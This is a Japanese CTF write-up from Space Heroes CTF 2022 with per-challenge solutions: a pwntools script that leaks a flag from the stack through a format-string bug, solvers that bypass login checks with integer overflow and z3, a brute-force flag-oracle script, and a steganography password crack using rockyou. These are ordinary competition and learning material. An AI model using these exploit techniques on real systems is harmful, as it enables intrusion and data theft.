この大会は2022/4/2 1:00(JST)~2022/4/4 6:00(JST)に開催されました。
今回もチームで参戦。結果は6862点で778チーム中10位でした。
自分で解けた問題をWriteupとして書いておきます。
Discord (sanity_check)
Discordに入り、MEE6ボットの情報を見ると、ロールの一つがフラグになっていた。
shctf{4ut0b0ts_r013_0u7}
k? (sanity_check)
Discordに入り、#welcome-and-rulesチャネルでRulesBotに「チェックアイコン」でリアクションすると、たくさんのチャネルが現れる。#announcementsチャネルのメッセージに以下が書いてある。
Ok. We had a banned wordlist. That included an f followed by two spaces, followed by a k. When people started typing k, it triggered ME6. We thought that was funny. So we made a last minute discord flag. Issue a custom command k and youll get the flag.
fの後に2つのスペースが続き、その後にkを入力すればよいらしい。#mee6チャネルで以下を入力する。
/help commands
すると、以下MEE6ボットから以下が返ってくる。
!k (optional text)
以下を入力する。
!k f k
DMでMEE6から以下のメッセージがあった。
k? shctf{WhY_iS_K_BaNnEd}
shctf{WhY_iS_K_BaNnEd}
Guardians of the Galaxy (pwn)
Ghidraでデコンパイルする。
void main(void) { FILE *__stream; long in_FS_OFFSET; char local_58 [32]; char local_38 [40]; undefined8 local_10; local_10 = *(undefined8 *)(in_FS_OFFSET + 0x28); buffer_init(); __stream = fopen("./flag.txt","r"); if (__stream == (FILE *)0x0) { puts("Error, please message admins with \'infinity_error\'."); /* WARNING: Subroutine does not return */ exit(0); } fgets(local_38,0x20,__stream); do { puts("Does Quill manage to win the dance battle?"); fgets(local_58,0x20,stdin); puts("\nOh no, Ronano has seen through the distraction!"); printf(local_58); putchar(10); } while( true ); }
$ nc 0.cloud.chals.io 12690 Does Quill manage to win the dance battle? AAAA%p.%p.%p.%p.%p.%p.%p.%p Oh no, Ronan has seen through the distraction! AAAA0x7f242fda5723.(nil).0x7f242fcc60a7.0x30.(nil).0x7ffca73c3fe0.0x55e3344e62a0.0x252e702541414141 Does Quill manage to win the dance battle?
$ file guardians guardians: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4122d7312e92c63007f47ac9e28406195bcc7859, for GNU/Linux 3.2.0, not stripped $ gdb -q ./guardians Reading symbols from ./guardians...(no debugging symbols found)...done. gdb-peda$ start [----------------------------------registers-----------------------------------] RAX: 0x555555555250 (<main>: endbr64) RBX: 0x0 RCX: 0x555555555320 (<__libc_csu_init>: endbr64) RDX: 0x7fffffffdef8 --> 0x7fffffffe251 ("CLUTTER_IM_MODULE=xim") RSI: 0x7fffffffdee8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/guardians") RDI: 0x1 RBP: 0x555555555320 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffde08 --> 0x7ffff7a03c87 (<__libc_start_main+231>: mov edi,eax) RIP: 0x555555555250 (<main>: endbr64) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x555555555120 (<_start>: endbr64) R13: 0x7fffffffdee0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x55555555524d <buffer_init+68>: nop 0x55555555524e <buffer_init+69>: pop rbp 0x55555555524f <buffer_init+70>: ret => 0x555555555250 <main>: endbr64 0x555555555254 <main+4>: push rbp 0x555555555255 <main+5>: mov rbp,rsp 0x555555555258 <main+8>: sub rsp,0x60 0x55555555525c <main+12>: mov rax,QWORD PTR fs:0x28 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffde08 --> 0x7ffff7a03c87 (<__libc_start_main+231>: mov edi,eax) 0008| 0x7fffffffde10 --> 0x1 0016| 0x7fffffffde18 --> 0x7fffffffdee8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/guardians") 0024| 0x7fffffffde20 --> 0x100008000 0032| 0x7fffffffde28 --> 0x555555555250 (<main>: endbr64) 0040| 0x7fffffffde30 --> 0x0 0048| 0x7fffffffde38 --> 0x632d42dbc6e01c23 0056| 0x7fffffffde40 --> 0x555555555120 (<_start>: endbr64) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, 0x0000555555555250 in main () gdb-peda$ disas main Dump of assembler code for function main: => 0x0000555555555250 <+0>: endbr64 0x0000555555555254 <+4>: push rbp 0x0000555555555255 <+5>: mov rbp,rsp 0x0000555555555258 <+8>: sub rsp,0x60 0x000055555555525c <+12>: mov rax,QWORD PTR fs:0x28 0x0000555555555265 <+21>: mov QWORD PTR [rbp-0x8],rax 0x0000555555555269 <+25>: xor eax,eax 0x000055555555526b <+27>: lea rax,[rbp-0x30] 0x000055555555526f <+31>: mov QWORD PTR [rbp-0x60],rax 0x0000555555555273 <+35>: mov eax,0x0 0x0000555555555278 <+40>: call 0x555555555209 <buffer_init> 0x000055555555527d <+45>: lea rsi,[rip+0xd84] # 0x555555556008 0x0000555555555284 <+52>: lea rdi,[rip+0xd7f] # 0x55555555600a 0x000055555555528b <+59>: call 0x555555555100 <fopen@plt> 0x0000555555555290 <+64>: mov QWORD PTR [rbp-0x58],rax 0x0000555555555294 <+68>: cmp QWORD PTR [rbp-0x58],0x0 0x0000555555555299 <+73>: jne 0x5555555552b1 <main+97> 0x000055555555529b <+75>: lea rdi,[rip+0xd76] # 0x555555556018 0x00005555555552a2 <+82>: call 0x5555555550c0 <puts@plt> 0x00005555555552a7 <+87>: mov edi,0x0 0x00005555555552ac <+92>: call 0x555555555110 <exit@plt> 0x00005555555552b1 <+97>: mov rdx,QWORD PTR [rbp-0x58] 0x00005555555552b5 <+101>: lea rax,[rbp-0x30] 0x00005555555552b9 <+105>: mov esi,0x20 0x00005555555552be <+110>: mov rdi,rax 0x00005555555552c1 <+113>: call 0x5555555550f0 <fgets@plt> 0x00005555555552c6 <+118>: lea rdi,[rip+0xd83] # 0x555555556050 0x00005555555552cd <+125>: call 0x5555555550c0 <puts@plt> 0x00005555555552d2 <+130>: mov rdx,QWORD PTR [rip+0x2d57] # 0x555555558030 <stdin@@GLIBC_2.2.5> 0x00005555555552d9 <+137>: lea rax,[rbp-0x50] 0x00005555555552dd <+141>: mov esi,0x20 0x00005555555552e2 <+146>: mov rdi,rax 0x00005555555552e5 <+149>: call 0x5555555550f0 <fgets@plt> 0x00005555555552ea <+154>: lea rdi,[rip+0xd8f] # 0x555555556080 0x00005555555552f1 <+161>: call 0x5555555550c0 <puts@plt> 0x00005555555552f6 <+166>: lea rax,[rbp-0x50] 0x00005555555552fa <+170>: mov rdi,rax 0x00005555555552fd <+173>: mov eax,0x0 0x0000555555555302 <+178>: call 0x5555555550e0 <printf@plt> 0x0000555555555307 <+183>: mov edi,0xa 0x000055555555530c <+188>: call 0x5555555550b0 <putchar@plt> 0x0000555555555311 <+193>: jmp 0x5555555552c6 <main+118> End of assembler dump. gdb-peda$ b *0x00005555555552ea Breakpoint 2 at 0x5555555552ea gdb-peda$ r Starting program: /mnt/hgfs/Shared/guardians Does Quill manage to win the dance battle? 1234 [----------------------------------registers-----------------------------------] RAX: 0x7fffffffddb0 --> 0xa34333231 ('1234\n') RBX: 0x0 RCX: 0x7ffff7af2031 (<__GI___libc_read+17>: cmp rax,0xfffffffffffff000) RDX: 0x7ffff7dcf8d0 --> 0x0 RSI: 0x7fffffffddb0 --> 0xa34333231 ('1234\n') RDI: 0x0 RBP: 0x7fffffffde00 --> 0x555555555320 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffdda0 --> 0x7fffffffddd0 ("flag{hoge}") RIP: 0x5555555552ea (<main+154>: lea rdi,[rip+0xd8f] # 0x555555556080) R8 : 0x7ffff7dcf8c0 --> 0x0 R9 : 0x7ffff7fdc4c0 (0x00007ffff7fdc4c0) R10: 0x7ffff7fdc4c0 (0x00007ffff7fdc4c0) R11: 0x246 R12: 0x555555555120 (<_start>: endbr64) R13: 0x7fffffffdee0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x5555555552dd <main+141>: mov esi,0x20 0x5555555552e2 <main+146>: mov rdi,rax 0x5555555552e5 <main+149>: call 0x5555555550f0 <fgets@plt> => 0x5555555552ea <main+154>: lea rdi,[rip+0xd8f] # 0x555555556080 0x5555555552f1 <main+161>: call 0x5555555550c0 <puts@plt> 0x5555555552f6 <main+166>: lea rax,[rbp-0x50] 0x5555555552fa <main+170>: mov rdi,rax 0x5555555552fd <main+173>: mov eax,0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdda0 --> 0x7fffffffddd0 ("flag{hoge}") 0008| 0x7fffffffdda8 --> 0x555555559260 --> 0xfbad2498 0016| 0x7fffffffddb0 --> 0xa34333231 ('1234\n') 0024| 0x7fffffffddb8 --> 0xf0b5ff 0032| 0x7fffffffddc0 --> 0xc2 0040| 0x7fffffffddc8 --> 0x55555555536d (<__libc_csu_init+77>: add rbx,0x1) 0048| 0x7fffffffddd0 ("flag{hoge}") 0056| 0x7fffffffddd8 --> 0x7d65 ('e}') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x00005555555552ea in main () gdb-peda$ x/16g $rsp 0x7fffffffdda0: 0x00007fffffffddd0 0x0000555555559260 0x7fffffffddb0: 0x0000000a34333231 0x0000000000f0b5ff 0x7fffffffddc0: 0x00000000000000c2 0x000055555555536d 0x7fffffffddd0: 0x676f687b67616c66 0x0000000000007d65 0x7fffffffdde0: 0x0000555555555320 0x0000555555555120 0x7fffffffddf0: 0x00007fffffffdee0 0x9c899ac3e6d4a500 0x7fffffffde00: 0x0000555555555320 0x00007ffff7a03c87 0x7fffffffde10: 0x0000000000000001 0x00007fffffffdee8
%12$pのスタックの場所にフラグので、その位置から繰り返し、8バイトずつリークする。
#!/usr/bin/env python3 from pwn import * p = remote('0.cloud.chals.io', 12690) i = 12 flag = b'' while True: payload = '%' + str(i) + '$p' data = p.recvuntil(b'?\n').rstrip().decode() print(data) print(payload) p.sendline(payload.encode()) data = p.recvuntil(b'!\n').rstrip().decode() print(data) data = p.recvline().rstrip().decode() print(data) flag += p64(int(data, 16)) data = p.recvline().rstrip().decode() print(data) if b'}' in flag: flag = flag[:flag.index(b'}') + 1].decode() print(flag) break i += 1
実行結果は以下の通り。
[+] Opening connection to 0.cloud.chals.io on port 12690: Done Does Quill manage to win the dance battle? %12$p Oh no, Ronan has seen through the distraction! 0x6d697b6674636873 Does Quill manage to win the dance battle? %13$p Oh no, Ronan has seen through the distraction! 0x636172747369645f Does Quill manage to win the dance battle? %14$p Oh no, Ronan has seen through the distraction! 0x756f795f676e6974 Does Quill manage to win the dance battle? %15$p Oh no, Ronan has seen through the distraction! 0x55fbc6000a7d shctf{im_distracting_you} [*] Closed connection to 0.cloud.chals.io port 12690
shctf{im_distracting_you}
Cape Kennedy (re)
パスワードの条件は以下の通り。
・パスワードの各文字のASCIIコードの合計は713 ・パスワードの長さは8バイト ・パスワードの以下のインデックスの文字は同じ ・2と5 ・3と4 ・6と7
この条件だけだといくつも答えはありそう。問題のタイトルや添付のファイル名から推測すると、"Apollo11"
shctf{Apollo11}
Launch Code (re)
Ghidraでデコンパイルする。
undefined8 main(void) { uint uVar1; int iVar2; time_t tVar3; undefined4 in_R9D; undefined4 in_R10D; undefined4 in_R11D; undefined4 unaff_R12D; print_logo(); tVar3 = time((time_t *)0x0); srand((uint)tVar3); uVar1 = rand(); puts("<<< Welcome to Shuttle Control Terminal."); timeout(0x1e); puts("----------------------------"); printf("<<< Random nonce = %i\n",(ulong)uVar1); printf("Enter launch auth code >>> "); get_launch_auth(); iVar2 = three(in_R9D,in_R10D,uVar1); if (((iVar2 == 0) && (iVar2 = two(in_R10D,in_R11D), iVar2 == 0)) && (iVar2 = one(in_R11D,unaff_R12D), iVar2 == 0)) { puts("<<< Authentication Succeeded."); blast_off(); return 0; } puts("<<< Authentication Failed."); return 0; } undefined4 get_launch_auth(void) { undefined4 local_18; undefined local_14 [4]; undefined local_10 [4]; undefined local_c [4]; __isoc99_scanf("%x %x %x %x",local_c,local_10,local_14,&local_18); return local_18; } int three(int param_1,int param_2,int param_3) { return (param_3 + param_1 + param_2) * 8; } uint two(int param_1,int param_2) { return param_1 / param_2 ^ 2; } int one(int param_1,int param_2) { return (param_1 - param_2) + 1; }
認証成功のためには以下の条件がある。
・(nonce + 第1コード + 第2コード) * 8 == 0 ・第2コード / 第3コード ^ 2 == 0 ・(第3コード - 第4コード) + 1 == 0
例えば以下のように指定すれば、条件を満たす。
第1コード(code0): 2147483648 - 1 第2コード(code1): 4294967296 // 8 * 9 - (nonce + code0) 第3コード(code2): code1 // 2 第4コード(code3): code2 + 1
サーバに接続し、この条件を指定して、実行する。
#!/usr/bin/env python3 from pwn import * p = remote('0.cloud.chals.io', 12499) data = p.recvuntil(b'--\n').rstrip().decode() print(data) data = p.recvline().rstrip().decode() print(data) nonce = int(data.split(' ')[-1]) code0 = 2147483648 - 1 code1 = 4294967296 // 8 * 9 - (nonce + code0) code2 = code1 // 2 code3 = code2 + 1 auth_code = f'{code0:x} {code1:x} {code2:x} {code3:x}' data = p.recvuntil(b'>>> ').decode() print(data + auth_code) p.sendline(auth_code.encode()) data = p.recvline().rstrip().decode() print(data) data = p.recvline().rstrip().decode() print(data)
実行結果は以下の通り。
[+] Opening connection to 0.cloud.chals.io on port 12499: Done MMMMMWXXWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNWMMMMM MMMMMO,,kWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMO;;OMMMMM MMMWO, ,OWMMMMMMMMMMMMMMMMMMMMMMMMMMW0xkKWMMMMMMMMMMMMMMMMMMMMMMMMMMWK: :KWMMM Xdc,. .,cdXMMMMMMMMMMMMMMMMMMMMMWO:. .lKWMMMMMMMMMMMMMMMMMMMMMXxl:. .:lxX Ko;. .;oKMMMMMMMMMMMMMMMMMMMMKl. .dNMMMMMMMMMMMMMMMMMMMMKc'. .'cK MMWNk' 'kXWMMMMMMMMMW0kXMMMMMMMWk' ... :0WMMMMMMMXxOWMMMMMMMMWNKd. .dKNWM MMMMMk..kWMMMMMMMMMMM0'.oNMMMMMNo. .:x0000x; 'kWMMMMMNl '0MMMMMMMMMMMWx..xWMMMM MMMMMWKKWMMMMMMMMMMMX: .kMMMMNl. ,ON0l::l0Xx. .kWMMMMk. cNMMMMMMMMMMMNOONMMMMM MMMMMMMMMMMMMMMMMMMMO. lNMMNo. '0Wx. .kNx. .OMMMNc 'OMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMd. ;XMWx. .dW0::dxxdc:0Nc ,KMMX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo ;XMK; .kMx':olll:,xWo lWMX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo ;XMx. .kMx. .xWo '0MX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo ;XNc .kMx. ;dd; .xWo .dWX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :XK; .OMx..xWMx..xWd lNX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :XK, .lXMx. ;dd; .xMK: cNX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :XK, .dNMMx. . .xMMXl. cNX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :XK,'kNXNMx. cOOc .xMXXNd.cNX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :NXx0Nx:OMx..xMMx..xWk:ONOkNX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo :NWWKl..kMx..xMMx..xMx..dNWMX; .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWo .xWNx' .kMx..xMMx..xMx. ;OWNd. .xMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMWd';dKXk; .kMx..xMMx..xMx. .:OX0o,,kMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMNKXOo' .kMx..xMMx..xMx. .,o0XXNMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMNkc'. .kMx..xWWx..xWx. .'lONMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMK: ;0MO,.'cc'.;0M0; .cXMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMWk:,,,,,,,,,,;dXX0XXo. .dXKOKXx;,,,,,,,,,;:OMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMWWNK000XWNX0XWXc.lNX:..cXX: :XWX0XNWX0KKKNWWMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMk'...oNK:.lXX; cNWX00XWX; ;XXc.cXXc...'kMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMO' .oWK, ;XX: cNNd;;dNN: cNX; ;XNl 'OMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMWKdoONMK, .xN0xKWx. .xNKxKNx. ;XMNkodKWMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMK, .lxkxl. .cdxdc. ;XMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMWNXNWMMMMMMMMMMXl......................lNMMMMMMMMMMWNXNWMMMMMMMMMMMM MMMMMMMMMMWO:'.':OWMMMMMMMMMNXKK00000KKKKKK00000KKKNMMMMMMMMMWO:'.':OWMMMMMMMMMM MMMMMMMMMMO. .OMMMMMMMMMMMMKl,,,lKMMMMKl;;;oXMMMMMMMMMMMMO. .OMMMMMMMMMM MMMMMMNOdl'.'::. 'ld0NMMMMMMMMWklclkNMMMMNklclkWMMMMMMMMNOdl' .::'.'ldONMMMMMM MMMMMKc. .oXXk; .cXMMMMMMMMWKOKWMMMMMMWKOKWMMMMMMMMXc. ;kXXo. .cXMMMMM MMMMNl. 'kO;.,c:;c:..lXNWMMMMMX: :XMMMMMMX: :XMMMMMWNKl..:c;:c,.;Ok. lNMMMM MMM0; .. ;k00Ol. .'cOWMMMK, ,KNOddONK, ,KMMMWOc'. .o0KKk; .. ;0WMM MMX; .. .cdl:' ''. .,' ':ldl. ... :XMM MMXdccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccxNMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM <<< Welcome to Shuttle Control Terminal. <<< You have 30 seconds to auth. ---------------------------- <<< Random nonce = 1381820302 Enter launch auth code >>> 7fffffff 4da31873 26d18c39 26d18c3a <<< Authentication Succeeded. <<< shctf{Every-cUb1c-1nch-0f-spAce-is-a-m1racl3} [*] Closed connection to 0.cloud.chals.io port 12499
shctf{Every-cUb1c-1nch-0f-spAce-is-a-m1racl3}
Times Up (re)
Ghidraでデコンパイルする。
undefined8 FUN_0010131a(void) { int iVar1; tm *ptVar2; undefined4 local_64; undefined4 local_60; undefined4 local_5c; undefined8 local_58; ulong local_50; undefined8 local_48; undefined8 local_40; undefined8 local_38; long local_30; char *local_28; time_t local_20 [2]; _INIT_0(); local_20[0] = time((time_t *)0x0); ptVar2 = localtime(local_20); local_58 = *(ulong *)ptVar2; local_50 = *(ulong *)&ptVar2->tm_hour; local_48 = *(undefined8 *)&ptVar2->tm_mon; local_40 = *(undefined8 *)&ptVar2->tm_wday; local_38 = *(undefined8 *)&ptVar2->tm_isdst; local_30 = ptVar2->tm_gmtoff; local_28 = ptVar2->tm_zone; puts("<<< Space Travel require precision."); printf("<<< Current Time Is: %02d:%02d:%02d\n",local_50 & 0xffffffff,local_58 >> 0x20, local_58 & 0xffffffff); printf("Enter authorization sequence >>> "); __isoc99_scanf("%x %x %x",&local_5c,&local_60,&local_64); iVar1 = FUN_001012ce(local_5c,local_60,local_64); if (iVar1 != 0xa4c570) { printf("<<< Authorization sequence not valid."); /* WARNING: Subroutine does not return */ exit(0); } if ((local_58._4_4_ < 0x11) || (0x11 < local_58._4_4_)) { puts("<<< You failed. Try Another Time."); } else { FUN_0010125c("flag.txt"); } return 0; } int FUN_001012ce(int param_1,int param_2,int param_3) { return (param_1 + param_2 + param_3 << ((byte)(param_1 % param_2) & 0x1f)) / (int)((2 << ((byte)param_1 & 0x1f) ^ 3U) * param_3); }
FUN_001012ce関数の結果が0xa4c570になるものをz3で求める。あとは、毎時17分台に実行しないと"<<< You failed. Try Another Time."というメッセージが表示され、フラグが表示されないので、17分になってから実行するようにする。
#!/usr/bin/env python2 from z3 import * import socket import datetime def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) x = BitVec('x', 32) y = BitVec('y', 32) z = BitVec('z', 32) s = Solver() s.add((x + y + z << ((x % y) & 0x1f)) / ((2 << (x & 0x1f) ^ 3) * z) == 0xa4c570) r = s.check() assert r == sat m = s.model() auth = '%x %x %x' % (m[x].as_long(), m[y].as_long(), m[z].as_long()) while True: dt_now = datetime.datetime.now() if dt_now.minute == 17: break s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('0.cloud.chals.io', 26020)) data = recvuntil(s, '>>> ') print(data + auth) s.sendall(auth + '\n') data = recvuntil(s, '\n').rstrip() print(data)
実行結果は以下の通り。
<<< Space Travel require precision. <<< Current Time Is: 11:17:00 Enter authorization sequence >>> fbad9fe9 ffcffe9f b17ae3d5 <<< Congratulations: shctf{b3yond_the_c0rridor_of_R_space_t1me}
shctf{b3yond_the_c0rridor_of_R_space_t1me}
R2D2 (web)
http://173.230.138.139/robots.txtにアクセスすると、フラグが書いてあった。
shctf{th1s-aster0id-1$-n0t-3ntir3ly-stable}
Flag in Space (web)
http://172.105.154.14/?flag=shctfと入力すると、その部分だけ表示された。
フラグ文字列が正しい部分だけ表示されるようだ。1文字ずつブルートフォースで正しい文字を探していく。
#!/usr/bin/env python3 import requests base_url = 'http://172.105.154.14/?flag=' flag = 'shctf{' for i in range(19): for code in range(32, 127): url = base_url + flag + chr(code) r = requests.get(url) res = r.text res = res.replace('<div>', '').replace('</div>', '') res = res.replace('\n', '').replace('</html>', '') flag_part = res[res.index(flag):] if flag != flag_part: flag = flag_part break print('[+] flag =', flag) print('[*] flag =', flag)
実行結果は以下の通り。
[+] flag = shctf{2 [+] flag = shctf{2_ [+] flag = shctf{2_e [+] flag = shctf{2_ex [+] flag = shctf{2_exp [+] flag = shctf{2_expl [+] flag = shctf{2_explo [+] flag = shctf{2_explor [+] flag = shctf{2_explor3 [+] flag = shctf{2_explor3_ [+] flag = shctf{2_explor3_f [+] flag = shctf{2_explor3_fr [+] flag = shctf{2_explor3_fro [+] flag = shctf{2_explor3_fron [+] flag = shctf{2_explor3_front [+] flag = shctf{2_explor3_fronti [+] flag = shctf{2_explor3_fronti3 [+] flag = shctf{2_explor3_fronti3r [+] flag = shctf{2_explor3_fronti3r} [*] flag = shctf{2_explor3_fronti3r}
shctf{2_explor3_fronti3r}
Space Traveler (web)
HTMLソースを見ると、スクリプトが以下のように書いてある。
<script> var _0xb645=["\x47\x75\x65\x73\x73\x20\x54\x68\x65\x20\x46\x6C\x61\x67","\x73\x68\x63\x74\x66\x7B\x66\x6C\x61\x67\x7D","\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x72\x69\x67\x68\x74\x2E","\x73\x68\x63\x74\x66\x7B\x65\x69\x67\x68\x74\x79\x5F\x73\x65\x76\x65\x6E\x5F\x74\x68\x6F\x75\x73\x61\x6E\x64\x5F\x6D\x69\x6C\x6C\x69\x6F\x6E\x5F\x73\x75\x6E\x73\x7D","\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x77\x72\x6F\x6E\x67\x2E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x64\x65\x6D\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64"];function myFunction(){let _0xb729x2;let _0xb729x3=prompt(_0xb645[0],_0xb645[1]);switch(_0xb729x3){case _0xb645[3]:_0xb729x2= _0xb645[2];break;default:_0xb729x2= _0xb645[4]};document[_0xb645[7]](_0xb645[6])[_0xb645[5]]= _0xb729x2} </script>
https://beautifier.io/で整形する。
function myFunction() { let _0xb729x2; let _0xb729x3 = prompt('Guess The Flag', 'shctf{flag}'); switch (_0xb729x3) { case 'shctf{eighty_seven_thousand_million_suns}': _0xb729x2 = 'You guessed right.'; break; default: _0xb729x2 = 'You guessed wrong.' }; document['getElementById']('demo')['innerHTML'] = _0xb729x2 }
shctf{eighty_seven_thousand_million_suns}
Mysterious Broadcast (web)
同じセッションを保ちながら同じURLにアクセスすると、最初は~であとは0, 1でレスポンスがある。試してみると、以下のような順でレスポンスが返ってくる。
~11000110110010110100011010101100100100011110110100110111101000110110001001110110101011000011010
7桁ごとに区切ってデコードしてみる。
>>> chr(int('1100011',2)) 'c' >>> chr(int('0110010',2)) '2' >>> chr(int('1101000',2)) 'h'
base64になるのかもしれない。
>>> import base64 >>> base64.b64encode(b'shc') b'c2hj'
フラグの先頭を試しにbase64エンコードすると、合っている。この前提でコードを取得し、デコードしてフラグを取得する。
#!/usr/bin/env python3 import requests import base64 def get_redirect_url(s, url): r = s.head(url, allow_redirects=False) if 'Location' in r.headers: return r.headers['Location'] return None def bin_to_b64decode(s): b64 = b'' for i in range(0, len(s), 7): b64 += bytes([int(s[i:i+7], 2)]) return base64.b64decode(b64).decode() url = 'http://173.230.134.127' s = requests.Session() url = url + get_redirect_url(s, url) b = '' init = True while True: r = s.get(url) body = r.text if init: init = False continue b += body if len(b) % 28 == 0: flag = bin_to_b64decode(b) if '}' in flag: break print(flag)
shctf{AsciiIsA7BitStandard}
Star Pcap (forensics)
ICMPのパケットのCodeの文字を並べてみる。
c2hjdGZ7TDBnMWMtaSQtdGgzLWJlZ2lOTmluZy0wZi13aSRkb019
base64文字列のようなので、デコードする。
$ echo c2hjdGZ7TDBnMWMtaSQtdGgzLWJlZ2lOTmluZy0wZi13aSRkb019 | base64 -d shctf{L0g1c-i$-th3-begiNNing-0f-wi$doM}
shctf{L0g1c-i$-th3-begiNNing-0f-wi$doM}
Future Stego (forensics)
$ stegcracker shuttlesteg.jpg dict/rockyou.txt StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker) Copyright (c) 2022 - Luke Paris (Paradoxis) StegCracker has been retired following the release of StegSeek, which will blast through the rockyou.txt wordlist within 1.9 second as opposed to StegCracker which takes ~5 hours. StegSeek can be found at: https://github.com/RickdeJager/stegseek Counting lines in wordlist.. Attacking file 'shuttlesteg.jpg' with wordlist 'dict/rockyou.txt'.. Successfully cracked file with password: sallyride79lcold Tried 4040777 passwords Your file has been written to: shuttlesteg.jpg.out sallyride $ cat shuttlesteg.jpg.out shctf{weightlessness_is_a_great_equalizer}
shctf{weightlessness_is_a_great_equalizer}
Netflix and CTF (forensics)
httpでフィルタリングすると、途中から以下のようなパスに順にPOSTしていることがわかる。
POST /keypress/Lit_s HTTP/1.1 POST /keypress/Lit_h HTTP/1.1 POST /keypress/Lit_c HTTP/1.1 POST /keypress/Lit_t HTTP/1.1 POST /keypress/Lit_f HTTP/1.1 POST /keypress/Lit_%7B HTTP/1.1 POST /keypress/Lit_T HTTP/1.1 :
パスの最後の文字を順に並べる。
shctf{T1m3-is-th3-ultimat3-curr3Ncy}
Space Captain Garfield (forensics)
絵文字をASCII文字に置き換える。
abc defg:2254. heifejk celmjgad nekdglo fplbqcpf pg ceaers ogelhpjkc mbl kgn ekd ngjld ajmg mblto ophfm{aeoeckeabugl} opblf flji
quipqiup で復号する。
log date:2254. captain garfield wanders throught he galaxy searching for new and weird life forms shctf{lasagnalover} short trip
shctf{lasagnalover}
Buzz's Secret Watch (Part 1) (forensics)
aviファイルの各フレームを静止画として切り出す。
#!/usr/bin/env python3 import cv2 video_path = 'buzzsaw.avi' cap = cv2.VideoCapture(video_path) num = 0 while(cap.isOpened()): ret, frame = cap.read() if ret == True: cv2.imwrite('div/picture{:0=3}'.format(num) + '.jpg', frame) num += 1 else: break cap.release()
赤の全点灯の後に緑で8bitの点灯をすることを繰り返している。
緑が点灯している様子を書き並べてみる。
01110011 01101000 01100011 01110100 01100110 01111011 01010011 01101000 00110011 01110010 00110001 01100110 01100110 00101101 01110100 01001000 00110001 01110011 00101101 01101001 01110011 00101101 01101110 00110000 00101101 01110100 00110001 01101101 00110011 00101101 01110100 00110000 00101101 01110000 01000001 01101110 00110001 01100011 01111101
これをASCIIコードの2進数表記として、デコードする。
#!/usr/bin/env python3 codes = ['01110011', '01101000', '01100011', '01110100', '01100110', '01111011', '01010011', '01101000', '00110011', '01110010', '00110001', '01100110', '01100110', '00101101', '01110100', '01001000', '00110001', '01110011', '00101101', '01101001', '01110011', '00101101', '01101110', '00110000', '00101101', '01110100', '00110001', '01101101', '00110011', '00101101', '01110100', '00110000', '00101101', '01110000', '01000001', '01101110', '00110001', '01100011', '01111101'] flag = '' for code in codes: flag += chr(int(code, 2)) print(flag)
shctf{Sh3r1ff-tH1s-is-n0-t1m3-t0-pAn1c}
The Legend of the Chozo (forensics)
PNGのシグネチャとIHDRチャンクが壊れているので、修復する。
50 47 89 0a 4e 0d 0a 1a -> 89 50 4e 47 0d 0a 1a 0a 0d 48 44 00 52 00 00 49 -> 00 00 00 0d 49 48 44 52
